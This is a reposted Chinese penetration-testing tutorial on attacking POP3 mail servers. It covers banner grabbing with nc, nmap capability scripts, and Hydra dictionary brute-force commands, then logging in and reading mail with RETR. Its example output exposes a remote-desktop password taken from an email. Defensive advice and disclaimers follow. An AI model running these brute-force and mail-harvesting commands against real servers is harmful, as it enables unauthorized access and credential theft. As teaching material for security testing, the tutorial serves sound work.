2026-01-20 01:25:02 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 文章系统梳理POP3协议渗透全流程：先用nc/nmap抓Banner与能力，再用Hydra高速爆破弱口令，登录后利用STAT/LIST/RETR等命令批量读取含账号密码的敏感邮件，最终给出启用POP3S、强密码、IP白名单、日志审计、及时补丁五项防御措施，操作门槛极低却可直取内网凭据。 综合评分： 82 文章分类： 渗透测试,红队,内网渗透,漏洞分析,办公安全

cover_image

干货：POP3 协议渗透全解析，从信息获取到邮箱突破

原创

xuzhiyang xuzhiyang

玄武盾网络技术实验室

2026年1月19日 14:49 江西

*免责声明：本文仅供安全研究与学习之用，严禁使用本内容进行未经授权的违规渗透测试，遵守网络安全法，共同维护网络安全，违者后果自负。

每日资源分享：泛微E-cology9 SQL 注入漏洞批量检测工具更多资源访问：www.xwdjs.ysepan.com

正文

在渗透测试中，邮件协议往往是容易被忽略的突破口，而 POP3 作为经典的邮件接收协议，因其配置不当或弱口令等问题，常成为攻击者的 “突破口”。今天就带大家全面掌握 POP3 协议渗透技巧，从基础操作到实战突破，一步步拿下目标！

一、先搞懂：POP3 协议是什么？

#

POP3（Post Office Protocol Version 3）是用于接收邮件的标准协议，默认端口为 110，通过明文传输账号密码（未加密场景），这也为渗透测试提供了可乘之机。常见的渗透思路包括：获取服务 Banner 信息、扫描服务能力、爆破账号密码、登录后读取敏感邮件。

二、实战技巧：5 步拿下 POP3 服务

#

1. Banner 信息获取（快速摸底）

#

Banner 信息能帮我们确认 POP3 服务器版本、厂商等关键信息，为后续渗透找突破口。核心命令（nc 方式，简单高效）：

nc&nbsp;-nv <目标IP>&nbsp;110

执行后将返回服务器响应，比如：+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready，直接暴露服务器版本，方便查找对应漏洞。

2. Nmap 脚本扫描（深度探测）

#

利用 Nmap 的专用脚本，可快速扫描 POP3 服务的能力和 NTLM 信息，进一步扩大攻击面。命令如下：

nmap&nbsp;--scripts&nbsp;"pop3-capabilities or pop3-ntlm-info" -sV -p&nbsp;<端口> <目标IP>

pop3-capabilities：探测服务器支持的命令（如 TOP、UIDL 等）
pop3-ntlm-info：获取 NTLM 认证相关信息，可能泄露系统版本。

账号密码爆破（核心步骤）

POP3 爆破是最常用的攻击手段，推荐使用 Hydra 工具，支持单账号密码和字典爆破，效率极高。

（1）单账号密码测试

hydra -s&nbsp;<端口>&nbsp;-l&nbsp;<用户名>&nbsp;-p&nbsp;<密码>&nbsp;-e nsr -t 22&nbsp;<目标IP>&nbsp;pop3

（2）字典批量爆破（推荐）

hydra -s&nbsp;<端口>&nbsp;-L&nbsp;<用户名字典路径>&nbsp;-P&nbsp;<密码字典路径>&nbsp;-e nsr -t 22&nbsp;<目标IP>&nbsp;pop3

参数说明：

-e nsr：尝试空密码、用户名 = 密码、反向用户名三种常见组合
-t 22：22 个线程并发，可根据网络情况调整
###
### 4. 命令行登录（验证与操作）
爆破成功后，通过 telnet 或 nc 方式登录 POP3 服务器，执行邮件读取、删除等操作。

（1）telnet 登录

telnet&nbsp;<目标IP>&nbsp;<端口>

（2）nc 登录（兼容更多环境）

nc&nbsp;<目标IP>&nbsp;<端口>

登录流程示例（实战关键步骤）：

# 连接成功后输入用户名USER&nbsp;用户名+OK &nbsp;# 服务器响应成功# 输入密码PASS 密码+OK Welcome billydean &nbsp;# 登录成功

5. 核心操作命令（读取敏感邮件）

#

登录后，通过以下命令获取邮件内容，挖掘关键信息（如账号密码、内部文档等）：

STAT：查看邮件总数和总大小
LIST：列出所有邮件的编号和大小
RETR <邮件编号>：读取指定编号的邮件（核心命令）
TOP <邮件编号> <行数>：查看邮件前 N 行内容
QUIT：退出登录（已标记删除的邮件会被清空）

实战示例（读取邮件）：

list &nbsp;# 列出邮件+OK&nbsp;2&nbsp;18071&nbsp;7862&nbsp;1021retr&nbsp;1&nbsp;&nbsp;# 读取1号邮件+OK Message followsFrom: [email protected] Billy Dean,Here&nbsp;is&nbsp;your login&nbsp;for&nbsp;remote desktop ...&nbsp;try&nbsp;not&nbsp;to forget it&nbsp;this&nbsp;time!username: 用户名password: 密码 &nbsp;# 成功获取远程桌面账号密码

三、防御建议：守住 POP3 安全防线

#

1、禁用明文传输：启用 POP3S（默认端口 995），通过 SSL/TLS 加密数据传、输
2、强化密码策略：设置复杂密码，定期更换，禁止使用弱口令
3、限制访问来源：仅允许内部 IP 或指定 IP 段访问 POP3 服务
4、定期审计：监控异常登录行为，及时发现爆破尝试
5、升级服务器版本：修复已知漏洞，避免被版本漏洞攻击

#

总结

POP3 协议渗透的核心在于 “信息收集 + 弱口令爆破 + 敏感信息提取”，操作门槛低但实战效果显著。在渗透测试中，不要忽略邮件协议这个 “隐藏突破口”，往往能从中获取服务器登录、内部系统账号等关键信息，为后续横向移动打下基础。

随手点个「推荐」吧！别逼我求你！！！

声明：技术文章均收集于互联网，仅作为本人学习、记录使用。侵权删！！

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：玄武盾网络技术实验室 xuzhiyang xuzhiyang《干货：POP3 协议渗透全解析，从信息获取到邮箱突破》